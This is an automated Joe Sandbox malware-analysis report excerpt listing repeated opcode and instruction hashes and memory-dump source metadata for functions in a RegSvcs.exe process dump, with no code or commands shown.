                                                                        • Instruction ID: df7c6622dc4e8c952c1de15c344287fe7e0143f42de1e552d0512af200d222c0
                                                                        • Opcode Fuzzy Hash: 8c87376cf0161bf9b5c772e9b459884438eb538a8bbf56c8ed5887d1c7f06de3
                                                                        • Instruction Fuzzy Hash: B5329C70A00225CFDB25DF69C480BAEBBF1FF48310F55456BE955AB3A1D730A882CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: 8268117823e53cb46fae859c5ca18d309f4875e9ab6a111a3de1b356307e8dad
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: 68F15071E0021A9FEF15DF99C580BAEBBF5BF48710F09812AE945AB364DB74D842CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a56f6bf04eecde620889eea61cd67d0a693037482d6a11b4c85e311631535922
                                                                        • Instruction ID: 6bb2fe7c51cbb242c4135dd8cfe4e3b7466e34c7ea87853a0018149f1ee867c1
                                                                        • Opcode Fuzzy Hash: a56f6bf04eecde620889eea61cd67d0a693037482d6a11b4c85e311631535922
                                                                        • Instruction Fuzzy Hash: 33D1E071A0060B8BDF15CF69C881AFFB7F9AF88304F18816BD955A7251E735E9068B60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f8df15d2fd9e875df3fcd70706625e9198b82bebad04fedcf61aede77788c60
                                                                        • Instruction ID: be3380699d87574a1d4a9de0ab05f7b3ab846a2bf0bd52be4f9b4c334c7cb2f3
                                                                        • Opcode Fuzzy Hash: 3f8df15d2fd9e875df3fcd70706625e9198b82bebad04fedcf61aede77788c60
                                                                        • Instruction Fuzzy Hash: 24E1B271609352CFC715CF28C090A6BBBE0FF89304F45896EE99987361DB31E946CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd5ccc479aece69a62c1d82b6c0dd72da2ec8c1134f0123b4bd62318c7f8c6ee
                                                                        • Instruction ID: ff61af58dc043b32d2f7c169481225b9ce073db214e163b70acf6a0d19a6bf0d
                                                                        • Opcode Fuzzy Hash: bd5ccc479aece69a62c1d82b6c0dd72da2ec8c1134f0123b4bd62318c7f8c6ee
                                                                        • Instruction Fuzzy Hash: FBD1F171A002079BDB14CF69C880BBBB7A5FF64314F04462FEA16DB2A4EB30D955CB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction ID: 384a0b13611203f3e8b0952ab97a9ba2fe8e58c93aad11980f3d2f153456e35e
                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction Fuzzy Hash: 14B1B675A00606AFEB24DF55C940EBBBBB5FFA4305F91442EAE42973A0DA30E905CB10
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction ID: b43e4c43482839ea4275f180015af1b36cf890f97c549449399e7d6ef521ee94
                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction Fuzzy Hash: 19B10871604646AFDB16DB68C850BBFBBF6AF98200F18025BE656DB3A1D730D942CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d686f3a2f037ab38aac0c39c961fa5a31b2761911578b610ae45547775e238c5
                                                                        • Instruction ID: aca3495a3c3f6d4f781c3e3b1930ee7824ac73d98d521d6c14820bf11254c928
                                                                        • Opcode Fuzzy Hash: d686f3a2f037ab38aac0c39c961fa5a31b2761911578b610ae45547775e238c5
                                                                        • Instruction Fuzzy Hash: 9EC166701083418FE764DF19C484BAFB7E4BF98708F44492EE989873A1E774E949CB92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ce4fbd655cb8b83971159a766c17199080441a61b62fd8c05369391091a44880
                                                                        • Instruction ID: 23de03f0f7d36526070575b52fd61b7d5fb42654df47a9ec0d57f450b88bcb1d
                                                                        • Opcode Fuzzy Hash: ce4fbd655cb8b83971159a766c17199080441a61b62fd8c05369391091a44880
                                                                        • Instruction Fuzzy Hash: 33B19270A402658BDB24CF59CC90BAEB3B5EF54700F1485EAD50AE7365EB30DD86CB21
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5612a65e51f153cb84eb22102ff42e69b393bc958706640aeabaa517d7f32057
                                                                        • Instruction ID: 5cf982fd2be13364c63af923ff312b34c3453443ccf5187f88c65b1fe0e6c0da
                                                                        • Opcode Fuzzy Hash: 5612a65e51f153cb84eb22102ff42e69b393bc958706640aeabaa517d7f32057
                                                                        • Instruction Fuzzy Hash: 66A1F731E006159FFB22EF59C848BAEBBA4BB05724F050167EA10BB3B1D7789D45CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3a223a4381575135e6425d78a639324694abd7c5f3cc89090cd8bf7c01b9bf82
                                                                        • Instruction ID: d760d726b2646ada2c4ce4ba5b57d56b68a7c74f595d1d526c3873aef44e9eb7
                                                                        • Opcode Fuzzy Hash: 3a223a4381575135e6425d78a639324694abd7c5f3cc89090cd8bf7c01b9bf82
                                                                        • Instruction Fuzzy Hash: 04A1B270B016169BDB25CF69C590BAAB7B9FF54318F00402FEA05973A1EB34E812CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 85859eb59cdf7a85a22f9c6e715e3728d6c2f771dc6d48110fe28836dd0e5e02
                                                                        • Instruction ID: 795e0cf6e45645426e9e0b54d1725bed9cd8c4d9b6bf068d080e0de4370fe91c
                                                                        • Opcode Fuzzy Hash: 85859eb59cdf7a85a22f9c6e715e3728d6c2f771dc6d48110fe28836dd0e5e02
                                                                        • Instruction Fuzzy Hash: 9BA1CC72A04212AFD712DF18C980B6BB7E9FF58714F09092EE6499B761CB74ED01CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41ad645ef7890b8e96f4b592202e27dd1b6154baab126263b06dbb4595a11bdd
                                                                        • Instruction ID: dfc146b99fffea5599a5aab798e895c0ccc53260ccf901b1e5b395553f18e047
                                                                        • Opcode Fuzzy Hash: 41ad645ef7890b8e96f4b592202e27dd1b6154baab126263b06dbb4595a11bdd
                                                                        • Instruction Fuzzy Hash: AD91E872D00216AFDB11DF69D890B7EBFB5AF58310F5B405AE610AB360D734D9018BA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d27cc8e6c8805e1f59434eb6ff9a1a8d5833272c23b1cae99b938a1e1bd70c9
                                                                        • Instruction ID: c84e9dccc9f8fe3511b794a9fdcc8e71f0dad9e1c5aa7bcad3d1abc3e9855f50
                                                                        • Opcode Fuzzy Hash: 2d27cc8e6c8805e1f59434eb6ff9a1a8d5833272c23b1cae99b938a1e1bd70c9
                                                                        • Instruction Fuzzy Hash: 11910431A02616DBEB25EB59C444B7EBBA1EFEC714F05406BE905AB3A0E734D902CB51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 611a4beabbb67ce1357a89dff08eb0af9978f516d46fe6627640e112e5822bcf
                                                                        • Instruction ID: ff6e63ab809014f49d6d1142a6a35ac5f54d5f0dc638ba66fcbe58b493a6fd8b
                                                                        • Opcode Fuzzy Hash: 611a4beabbb67ce1357a89dff08eb0af9978f516d46fe6627640e112e5822bcf
                                                                        • Instruction Fuzzy Hash: 2A8171B1A006259FEB18CF69D940AFEBBFAFB48700F05852EE455E7650E334D941CB94
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction ID: 271d877023298e770832c92a7b0255ca11ce5079a5ab3f16da3c1ba978b110b3
                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction Fuzzy Hash: 91819431A002059FDF19CF99C488AAEBBF2FF94311F24856ED9169B364D774D912CB40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 844302f288ad55edad57cd28d5153ff53028900bd0c5a43990f87eee95ea5117
                                                                        • Instruction ID: 2e7168bc232d9167cc3e1679a976bb9e10862bb94a48ee917ba45c5578f05b73
                                                                        • Opcode Fuzzy Hash: 844302f288ad55edad57cd28d5153ff53028900bd0c5a43990f87eee95ea5117
                                                                        • Instruction Fuzzy Hash: 7F719F716047029FDB21CF19C980BABB7E8FB48278F15492BE955D7360E730E945CB92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d35f9af75da7e431705f40a239584bd2f71f048154d0c3f2861d5533b4e88515
                                                                        • Instruction ID: 7d5c9cedc523dd3fc931f1f107afc815c8e3b8da2a728453c3080bf35a98b880
                                                                        • Opcode Fuzzy Hash: d35f9af75da7e431705f40a239584bd2f71f048154d0c3f2861d5533b4e88515
                                                                        • Instruction Fuzzy Hash: F7817D71A00609EFDB65CFA9C880AEEFBBAFF48354F10442EE555A7221D770AD05CB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b6f0e208d3f3bd152c630f5c5f39a8c3ce5f07291c7a1a62286a31ab05e22dd
                                                                        • Instruction ID: 773f25abdb69e9edbc0774b04c7a5a4561c683a3195a9656527b1c143c6f1f9c
                                                                        • Opcode Fuzzy Hash: 6b6f0e208d3f3bd152c630f5c5f39a8c3ce5f07291c7a1a62286a31ab05e22dd
                                                                        • Instruction Fuzzy Hash: 5071BB75D0062ADBCB269F59C9907BEBBF1FF98710F14411BE952AB360D3709806CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db07e67709af7810c9e67d0cb368001004158b00cf17b7ec0a1e09ea950350c5
                                                                        • Instruction ID: fce96f55f426da119e0c6f07d03cbc8f1fe3cccb09ca8963ed8f3fbcf6e7d72a
                                                                        • Opcode Fuzzy Hash: db07e67709af7810c9e67d0cb368001004158b00cf17b7ec0a1e09ea950350c5
                                                                        • Instruction Fuzzy Hash: 7D71DF709002579FDB11CF59C880AFABBF9EF95314F04805AE994DB362E334DA46C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d617634ee1c33d5243c8ef709ea79af57d29bb0fa4d86456651b896c55965078
                                                                        • Instruction ID: 7e7ef2b06cd9e81ef427c83ac9e8a0de341d5833e57c78c76539c70befc9ff7e
                                                                        • Opcode Fuzzy Hash: d617634ee1c33d5243c8ef709ea79af57d29bb0fa4d86456651b896c55965078
                                                                        • Instruction Fuzzy Hash: 5871DE756046429FD312DF29C480B2AB7E5FFD8310F0585ABE899CB362DBB4D846CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction ID: 6f0add81e3ae3600b79122699f5caa60d78a0d50abbb38837cb3e0c1b4e922a3
                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction Fuzzy Hash: 21717171D00619AFDB10DFAAC984EDEBBB9FFA8700F51456AE505E7260DB34EA01CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ab2f245ded64e8c726dbcaa5220feac9d6f6917afda6e6e4f9f7e735873e516
                                                                        • Instruction ID: fcc564156a1969303f5d3924874e7f3feb2f0527f9e40a24ef68425b34d502dd
                                                                        • Opcode Fuzzy Hash: 8ab2f245ded64e8c726dbcaa5220feac9d6f6917afda6e6e4f9f7e735873e516
                                                                        • Instruction Fuzzy Hash: 8671F432200B01AFE732DF19C884F96BBA6EF54724F16452EE6158B2B0D779E945CB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3a7e182a9261462a84d432d0efcaab3b4967415386dd6505d579a856e61b886
                                                                        • Instruction ID: b4e1385691bfbf29de11055a88c2971f3c060b725746940246b0e0279fdb1ab2
                                                                        • Opcode Fuzzy Hash: a3a7e182a9261462a84d432d0efcaab3b4967415386dd6505d579a856e61b886
                                                                        • Instruction Fuzzy Hash: CF81A072A043168FDB25DF98D584F6EBBF1BB48310F56512EE910AB3A1C7B49D81CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f0b707f3a5085ddaa4567a87b53834f56b1324093e746064a9325fd8ef5a05e
                                                                        • Instruction ID: 3685a7f05acdc40a060e952add118844f2225912ffc4fcb4577cf5fe1972089b
                                                                        • Opcode Fuzzy Hash: 1f0b707f3a5085ddaa4567a87b53834f56b1324093e746064a9325fd8ef5a05e
                                                                        • Instruction Fuzzy Hash: 0E51CE74900706AFD761CF5AC884AABFBF8BFA4B10F10462FD292976B0D7B0A541CB54
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 710169d2d7ee39cab4aee769a2c9f0630bd2f1e237eed8d46bb5ad5605b0c53b
                                                                        • Instruction ID: 76ef97e18d045e44853e82df7094603ccd9924cf7af82bb3dfd70f1e524627eb
                                                                        • Opcode Fuzzy Hash: 710169d2d7ee39cab4aee769a2c9f0630bd2f1e237eed8d46bb5ad5605b0c53b
                                                                        • Instruction Fuzzy Hash: 8A516C71200A05EFDB22DFAAC980E6AB7B9FF68754F40046FE95197271D734EA41CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 400d3faa13a6759ae2cc7888bbd86f984c60f6589252a3d495041f1256e57936
                                                                        • Instruction ID: a3f9bfbf6566863c58070d0dbba79955799c906ecd40cc8efb7bf56d44f42a17
                                                                        • Opcode Fuzzy Hash: 400d3faa13a6759ae2cc7888bbd86f984c60f6589252a3d495041f1256e57936
                                                                        • Instruction Fuzzy Hash: 89517A756083028FD790DF2AC991A6BBBE5BFD8A18F48492EF585C7360D730D905CB52
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction ID: 05893762fbaea78ffd5f1d6250403e44634b9e0fb72fef99ba42ab7f607c385e
                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction Fuzzy Hash: E0518D71E0021AABEF15DF98C440BEEBBB5AF45354F08406AEA05AB360D734DD45CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                        • Instruction ID: de3716bd0e5e03f8cd590fa8af3ecf81d6c8a77001841bb98299c0aeeee43ceb
                                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                        • Instruction Fuzzy Hash: 7C51B73190021AEFDF11DB95C894BAFBB78AB24314F52465BD622772B0D7709D41C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0157577bb64443ad05fa2f3d7aea14886dd5bae879b577a16d53012c05a70b7
                                                                        • Instruction ID: 7690b450c72c738e481df2a392eef58d651b4bc2487ae5d3aa49d095d892d0ec
                                                                        • Opcode Fuzzy Hash: a0157577bb64443ad05fa2f3d7aea14886dd5bae879b577a16d53012c05a70b7
                                                                        • Instruction Fuzzy Hash: C941E6707016039FEE25DB2DC99CB3BBBDAEF91222F04461AF9558B3A1D734D811C690
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 424e832c75259a15a9ee2e22a7e3d61b28f5066a6e3aa5ff001637394e4ee298
                                                                        • Instruction ID: 2377aeb4b44af13e198ece6e040c23fd4d8060c78af7d838c35c47a344c2abdd
                                                                        • Opcode Fuzzy Hash: 424e832c75259a15a9ee2e22a7e3d61b28f5066a6e3aa5ff001637394e4ee298
                                                                        • Instruction Fuzzy Hash: C7518D71900216DFCB61DFA9C9C09AFBBF9FB68214B92451AD516AB314D770AD02CBD0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: baca3b564c1bdf3b752c7fb2e65431d6103ba1f3b61592e87324f2b9acdcb439
                                                                        • Instruction ID: 29c1a519d677fd5e3fcecbbb326112186a72335a83ab882ddde3b8b9c3eda88c
                                                                        • Opcode Fuzzy Hash: baca3b564c1bdf3b752c7fb2e65431d6103ba1f3b61592e87324f2b9acdcb439
                                                                        • Instruction Fuzzy Hash: B2412E716403029BDF66EF6A9890F6A3B64E76970CF02012FED159F272D7B19C05D790
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                        • Instruction ID: 5d3d1eec8cc8e61d3cb58c7c060096e01c4bdfde9ca74ea9ae1b7f4e12a615c3
                                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                        • Instruction Fuzzy Hash: 76411A716007169FDB25CF19C988A6BB7E9FF94211B15462FE91287750EB30ED09C7D0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0159190ec8a45406742aa3e85bff289296c2a3c87b603bfc81154c0cf1df1337
                                                                        • Instruction ID: 086b0ae4ffc141b95b57df6c137c8df185ce2ffff8368d4bd65eaed8611f7a4c
                                                                        • Opcode Fuzzy Hash: 0159190ec8a45406742aa3e85bff289296c2a3c87b603bfc81154c0cf1df1337
                                                                        • Instruction Fuzzy Hash: 9041A93A9002199BDB50DF99C440AEEBBB4AF58710F14826BFD15A7362D7349D42CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d050663956222a86f3947f6406f1b3fc724608668ba6affd6922b214be934f18
                                                                        • Instruction ID: 416398e337fb09b764d395975c36d0e97e1228965f53286cd3f58b595f0aec38
                                                                        • Opcode Fuzzy Hash: d050663956222a86f3947f6406f1b3fc724608668ba6affd6922b214be934f18
                                                                        • Instruction Fuzzy Hash: 1D41E6716043028FE721EF29C880A2BB7E5FF98214F01482FEA57D7761DB75E8498B55
                                                                        Memory Dump Source
